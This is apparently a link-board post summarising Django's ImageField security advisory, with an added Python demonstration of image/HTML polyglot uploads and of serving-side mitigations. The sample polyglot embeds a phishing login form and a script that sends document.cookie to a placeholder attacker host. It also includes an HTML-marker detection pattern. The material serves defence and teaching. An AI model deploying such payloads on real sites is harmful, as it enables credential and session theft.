Security advisory: ImageField abuse

posted on dec 03 by djangolinks

django imagefield phishing security

  • ID: 315
  • Title: Security advisory: ImageField abuse

  • Url: http://www.djangoproject.com/weblog/2013/dec/02/image-field-advisory/
  • Description: We've received a report of a means of allowing an HTML file to be uploaded via Django's ImageField. As ImageField is expected to validate for a valid image file, this provides an attack vector for someone to upload a phishing form, something to steal cookies, or something else malicious. Unfortunately, we cannot offer a solution in Django itself. Rather, you need to take some steps in how you serve static files in order to mitigate this type of attack. These steps are now outlined in our security guide. We recommend that if you allow image uploads that you check your server's configuration against the guide.
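The attack the advisory describes, and the serving-side mitigation it points to, as an added Python example. This is not code from Django or from this page: the magic-byte `looks_like_image` check is a stand-in for an image validator (the assumption being that such a check, like any decoder that stops at the GIF trailer, accepts an image with HTML appended), the polyglot sample and the `attacker.invalid` URL are constructed for the demonstration, and the response headers are the standard browser-side mitigations (refuse MIME sniffing, force a download), to be checked against Django's security guide rather than taken as its exact wording. Standard library only.

```python
"""An image/HTML polyglot passes a header check; the fix is in how uploads are served.

Added example, not Django's code. Stand-in validator and constructed inputs are
labelled below.
"""
import os
import re

# Constructed sample input: a complete, valid 1x1 GIF89a image (43 bytes).
MINIMAL_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00"
    b"\x02\x02D\x01\x00;"
)

# Constructed sample: the same GIF with a phishing form and a cookie-stealing
# script appended after the GIF trailer (';'). GIF decoders stop at the trailer,
# so the image part still decodes; a browser that sniffs the content, or that is
# told the file is text/html, renders the markup instead. attacker.invalid is a
# placeholder (reserved TLD), not a real host.
POLYGLOT = MINIMAL_GIF + (
    b"\n<html><body><form action='https://attacker.invalid/steal' method='post'>"
    b"Session expired, please log in: <input name='password'><input type='submit'>"
    b"</form><script>location='https://attacker.invalid/?c='+document.cookie</script>"
    b"</body></html>"
)

# Magic bytes for the formats an avatar-style upload field typically accepts.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"\xff\xd8\xff": "image/jpeg",
}


def looks_like_image(data: bytes):
    """Stand-in (assumption) for a header-based image check. Returns the
    detected MIME type or None. A polyglot satisfies this check, which is the
    point the advisory makes."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


# Active-content markers. Case-insensitive, tolerant of whitespace after '<'.
HTML_MARKERS = re.compile(rb"<\s*(html|script|form|iframe|body|svg|meta)\b", re.IGNORECASE)


def contains_html(data: bytes) -> bool:
    """Defence-in-depth check at upload time: reject an 'image' that also
    carries HTML markup. Obfuscation and odd encodings can evade this, so the
    serving headers below remain the real mitigation."""
    return HTML_MARKERS.search(data) is not None


def accept_upload(data: bytes):
    """Returns (accepted, mime_type_or_reason). The MIME type returned here is
    what should be stored and later sent as Content-Type; never re-derive it
    from the bytes at serving time."""
    mime = looks_like_image(data)
    if mime is None:
        return (False, "not a recognised image format")
    if contains_html(data):
        return (False, "image file also contains HTML markup")
    return (True, mime)


def safe_filename(filename: str) -> str:
    """Reduce a user-supplied name to a basename of safe characters so it can
    be placed inside a quoted Content-Disposition parameter."""
    base = os.path.basename(filename) or "download"
    return re.sub(r"[^A-Za-z0-9._-]", "_", base)


def upload_response_headers(validated_content_type: str, filename: str) -> dict:
    """Headers for serving a user upload. Content-Type comes from the type
    validated at upload; nosniff stops the browser from reinterpreting it as
    HTML; the attachment disposition makes a direct visit download the file
    rather than render it; the CSP sandboxes anything that does render."""
    return {
        "Content-Type": validated_content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_filename(filename)}"',
        "Content-Security-Policy": "default-src 'none'; sandbox",
        "Cache-Control": "private",
    }


if __name__ == "__main__":
    print("header check on polyglot:", looks_like_image(POLYGLOT))  # passes
    print("upload decision on polyglot:", accept_upload(POLYGLOT))
    print("upload decision on clean gif:", accept_upload(MINIMAL_GIF))
    for k, v in upload_response_headers("image/gif", 'avatar".gif').items():
        print(f"{k}: {v}")
```

The headers only neutralise the rendering of a file that has already been accepted; the other half of the mitigation, serving uploads from a separate origin so that a rendered page cannot read the application's cookies, is a deployment choice rather than something a snippet can show. The `contains_html` check is worth keeping as a tripwire and a log signal, not as the control you rely on.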
